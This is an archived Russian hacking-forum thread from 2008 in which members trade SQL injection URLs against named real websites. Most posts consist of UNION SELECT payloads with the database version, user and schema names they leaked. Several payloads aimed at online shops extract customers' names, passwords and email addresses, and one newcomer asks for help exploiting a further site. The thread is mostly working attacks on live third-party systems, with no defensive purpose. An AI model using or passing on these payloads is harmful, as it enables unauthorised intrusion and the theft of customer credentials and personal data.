ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4791  
Старый 14.02.2008, 18:10
Digital Cat
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
Провел на форуме:
1297994

Репутация: 237
Отправить сообщение для Digital Cat с помощью ICQ
По умолчанию

kair


И впрямь no comments))
 
Ответить с цитированием

  #4792  
Старый 14.02.2008, 18:24
db_reader
Новичок
Регистрация: 23.01.2008
Сообщений: 15
Провел на форуме:
20588

Репутация: 63
По умолчанию

http://www.upvaft.org/articles/index.php?id=-54+union+select+1,2,3,4,concat_ws(0x3A3a,version() ,user(),database()),6,7,8,9,10,11/*

4.1.22-standard::upvafto_php@localhost::upvafto_content

Таблицы не искал, нет времени.
 
Ответить с цитированием

  #4793  
Старый 14.02.2008, 19:28
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
Post

PHP код:
http://topmanagement.com.mx/modules.php?name=Noticias&file=seccion&idseccion=-1+union+select+aid+from+nuke_authors-- 
 
Ответить с цитированием

  #4794  
Старый 14.02.2008, 21:57
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

http://artslivres.com/ShowArticle.php?Id=-1+union+select+0,1,2,3/*

Хз как дальше- вроде пральное число столбцов,а пишет неизвестное число.В конце пишет 0,0- хрень...
 
Ответить с цитированием

  #4795  
Старый 14.02.2008, 21:57
BizzyD
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175

Репутация: 252
Отправить сообщение для BizzyD с помощью ICQ
По умолчанию

Код:
http://www.shejay.net/artistDetail.php?userID=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
web84_u1@localhost:web84_db1:5.0.32-Debian_7etch4-log

Код:
http://moshonka.ru/anketka.php?userid=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
db20@80.77.86.211:db20:5.0.45-Debian_1



Код:
http://www.basketball.ru/netcat/modules/user/profile.php?userid=99999+union+select+1,2,3,4,5,6,7/*

Код:
http://www.rematico.com/shop.php?userid=99999'+union+select+concat_ws(0x3a,user(),database(),version()),2,3/*
usr_phpprobid@localhost: DB_phpprobid:4.1.20


Код:
http://teams.supercheats.com/category.php?cid=1'+union+select+1,2,3/*

webuser@localhost:supercheats_forum:4.1.20 Related
 
Ответить с цитированием

  #4796  
Старый 15.02.2008, 00:38
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

Код HTML:
http://www.chinesekungfuhustle.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
4.0.25:kungfu@localhost:kungfu

Код HTML:
http://ourcoffeebarn.com/estore/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
5.0.45-community:ourcoffe_osc1@localhost:ourcoffe_osc1 (ммм пятая версия это хорошо =))))
посмотрим что тут у нас в INFORMATION_SCHEMA.TABLES
Код HTML:
http://ourcoffeebarn.com/estore/customer_testimonials.php?testimonial_id=99999+union+select+1,2,TABLE_NAME,4,5,6,7,8+FROM+INFORMATION_SCHEMA.TABLES/*
Код HTML:
http://www.tiendaslatinas.com/centrocomercial/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
4.1.22-standard:luis2@localhost:luis2_tienda

Код HTML:
http://www.signbabies.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
4.1.20-log:inksp3c1_12@209.68.3.204:inksp3c1_signbabies

Код HTML:
http://www.ameripromo.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers
/*
4.1.20-log:inksp3c1_19@209.68.3.204:inksp3c1_ameripromo
Код HTML:
http://www.affiliatesexcel.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
вота =)))

Последний раз редактировалось satana8920; 15.02.2008 в 01:16..
 
Ответить с цитированием

  #4797  
Старый 15.02.2008, 09:23
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Интернет магазин
usb.brando.com.hk

Код:
http://usb.brando.com.hk/prod_list.php?dept_id=015&cat_id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,VERSION(),13,14,15,16,17,18/*
4 версия
 
Ответить с цитированием

  #4798  
Старый 15.02.2008, 09:59
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

http://russiancinema.ru/template.php?dept_id=3&e_dept_id=99999+union+selec t+1,concat_ws(0x2F,version(),database(),user()),3, 4/*

5.0.32-Debian_7etch3-log/seanceitstar/seanceitstar@hosting.itstar.ru


как я понял управляется starcms.. поэтому в полне возможно что и на других проектах прокатит... хз

ЗЫ с перебором влом было возится.. кому нужно думаю подберет

++++++++++++++++++++++++++++++++++++++++++++++++
Цитата:
http://www.leika.ru/pages/articles.php?item_id=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(), database(),user()),7,8,9,10,11/*
4.0.27-standard/db_leika1/leika1@localhost

Последний раз редактировалось xcedz; 15.02.2008 в 11:31..
 
Ответить с цитированием

  #4799  
Старый 15.02.2008, 13:25
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

http://www.at-g.ru/
Код:
http://www.at-g.ru/index.php?base_name=atg_second&id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7/*
5.0.24-standard/db_atg1/atg1@localhost.localdomain


Код:
http://www.ac-psych.org/index.php?id=0x3127%20union+select+concat_ws(0x2F,version(),database(),user())/*
5.0.33-log/acpsych_ac-psych/acp_ac-psych@81.2.203.24

Мои первые SQL инекций которые я сам сделал)
за это респект LoFFi, BizzyD, Piflit и it's my. Еще с 9 утра сидел чтоб все норма понять, и напряг мозги и получилось) вот так вот
 
Ответить с цитированием

  #4800  
Старый 15.02.2008, 13:28
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

Я нашел скуль:
http://event.zontik.ru/?cat=30'
Пробовал раскрыть его, но ничего не получается=((
Помогите пожалуйста раскрыть скуль.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 12 (пользователей: 0 , гостей: 12)
 


Быстрый переход




ANTICHAT.XYZ